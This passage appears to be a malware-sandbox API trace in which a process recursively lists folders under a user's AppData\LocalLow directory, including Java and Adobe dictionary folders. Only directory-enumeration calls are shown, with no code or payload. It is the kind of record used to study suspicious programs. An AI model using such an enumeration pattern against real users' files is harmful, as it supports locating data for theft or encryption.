HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0218.574] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0218.574] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.574] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0218.574] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.575] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.575] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.575] PathFindFileNameW (pszPath="") returned="" [0218.575] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.575] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.575] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfaeead90, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="si", cAlternateFileName="")) returned 1 [0218.575] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfaeead90, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="si", cAlternateFileName="")) returned 0 [0218.575] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.575] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.576] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.576] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\") returned="all\\" [0218.576] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0218.576] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0218.576] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0218.576] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0218.576] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.576] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0218.576] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.576] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.576] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.576] PathFindFileNameW (pszPath="") returned="" [0218.576] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.578] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.578] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.578] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.578] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.578] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.578] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\") returned="brt\\" [0218.578] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0218.578] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0218.578] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0218.578] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0218.578] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.578] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0218.578] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.578] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.578] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.579] PathFindFileNameW (pszPath="") returned="" [0218.579] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.580] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.580] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.580] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.580] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.580] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.580] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\") returned="brz\\" [0218.580] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0218.580] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0218.580] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0218.581] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0218.581] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.581] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0218.581] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.581] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.581] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.581] PathFindFileNameW (pszPath="") returned="" [0218.581] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.582] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.582] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.582] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.582] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.582] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.582] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\") returned="dan\\" [0218.583] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0218.583] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0218.583] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0218.583] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0218.583] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.583] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0218.583] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.583] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.583] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.583] PathFindFileNameW (pszPath="") returned="" [0218.583] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.583] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.583] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.584] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.584] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.584] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.584] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\") returned="dut\\" [0218.584] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0218.584] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0218.584] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0218.584] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0218.584] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.584] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0218.584] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.584] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.584] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.584] PathFindFileNameW (pszPath="") returned="" [0218.584] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.586] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.586] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.586] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.586] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.586] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.586] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\") returned="eng\\" [0218.586] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0218.586] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0218.586] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0218.586] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0218.586] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.586] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0218.586] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0218.587] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0218.587] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0218.587] PathFindFileNameW (pszPath="") returned="" [0218.587] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0218.587] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0218.587] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0218.587] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0218.587] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0218.587] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0218.588] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\") returned="frn\\" [0218.588] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0218.588] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0218.588] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0218.588] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0218.588] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0218.588] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS 